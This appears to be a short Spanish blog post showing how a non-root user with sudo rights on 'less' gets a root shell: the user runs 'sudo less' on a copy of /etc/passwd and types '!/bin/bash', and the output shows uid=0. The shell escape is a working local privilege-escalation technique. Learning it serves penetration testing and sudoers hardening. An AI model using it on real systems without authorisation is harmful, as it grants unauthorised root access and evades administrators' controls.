En esta entrada veremos un procedimiento muy rápida de como escalar a root con un usuario non-root.
Para ello, usaremos less, como comando y teniendo en cuenta que el binario está configurado dentro de sudoers.
El primer paso será realizar una copia de nuestro fichero de usuarios, en este caso, con el usuario pi.
Seguidamente ejecutaremos less con sudo:
pi@node01:~ $ sudo cp -rp /etc/passwd /etc/passwd2
pi@node01:~ $ sudo less /etc/passwd2
y finalizamos el comando escribiendo:
!/bin/bash
Al salir, veremos que ya somos root:
root@node01:/home/pi#
root@node01:/home/pi# id
uid=0(root) gid=0(root) groups=0(root)